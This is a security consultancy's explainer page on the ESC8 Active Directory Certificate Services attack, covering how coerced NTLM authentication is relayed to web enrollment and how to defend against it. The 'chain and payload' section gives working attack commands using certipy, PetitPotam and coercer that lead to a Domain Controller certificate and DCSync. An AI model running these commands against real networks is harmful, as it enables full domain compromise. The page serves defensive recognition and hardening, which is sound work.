Active Directory · Term

What is ESC8?

ESC8 relays a coerced machine authentication, often a Domain Controller, to the certificate authority’s web enrollment page, yielding a certificate for that machine and a path to full domain compromise. Here is what ESC8 is, the chain, and how to shut it down.

Active Directory · TermAll services
TL;DR

ESC8 is an AD CS attack that combines NTLM relay with the CA’s HTTP web enrollment endpoint (certsrv). The attacker coerces a privileged machine, often a Domain Controller, to authenticate to them, then relays that authentication to the web enrollment page to request a certificate as that machine. A Domain Controller certificate leads straight to DCSync and full compromise. It chains a coercion trick (PetitPotam, Coercer) with relay, and the fix is disabling NTLM and enforcing HTTPS with channel binding on enrollment.

By John Dill, Red Team Lead, SecureLayer7Updated

What ESC8 is

AD CS can expose a web enrollment interface over HTTP (the certsrv application). By default it accepts NTLM authentication, and NTLM is relayable.

ESC8 abuses this: the attacker stands up an NTLM relay aimed at the web enrollment URL, then forces a target machine to authenticate to them using a coercion technique. They relay that authentication to the CA and request a certificate in the victim machine’s name. If the victim is a Domain Controller, the resulting certificate authenticates as the DC, which is game over.

The chain and payload

ESC8 is a two-tool chain: relay plus coercion.

  • Start the relay at web enrollment: certipy relay -target http://CA-HOST/certsrv/certfnsh.asp -template DomainController
  • Coerce a Domain Controller to authenticate to the relay: PetitPotam.py <attacker-ip> <dc-ip> or coercer coerce -u user -p pass -t <dc> -l <attacker-ip>
  • The relay obtains a DC certificate; authenticate with it: certipy auth -pfx dc.pfx
  • Use the DC identity for DCSync.

Documented techniques shown for defensive recognition.

How to defend

  • Disable NTLM on the AD CS web enrollment endpoints, and prefer removing web enrollment entirely if unused.
  • Enforce HTTPS with Extended Protection for Authentication (channel binding) so relayed authentication is rejected.
  • Enable Require SMB/LDAP signing and EPA across the environment to blunt relay broadly.
  • Patch and mitigate coercion vectors (PetitPotam and related) and restrict who can reach the CA web endpoint.
  • Monitor for machine-account certificate requests, especially for Domain Controllers.

References

  1. [1]Microsoft: Active Directory Certificate Services(Microsoft)
  2. [2]MITRE ATT&CK Enterprise Matrix(MITRE)
  3. [3]NIST SP 800-115 Technical Guide to Security Testing(NIST)
Related terms

Common questions

Active Directory, asked often

Need your Active Directory tested?

Scope an engagement

Test your Active Directory before an attacker does.

We run internal and Active Directory penetration tests that follow the real path from one low-privilege user to Domain Admin, then hand your team a report with reproducible evidence and a fix for every step. Free re-test included.

See all services30-min scoping call, fixed-price proposal in 48 hours.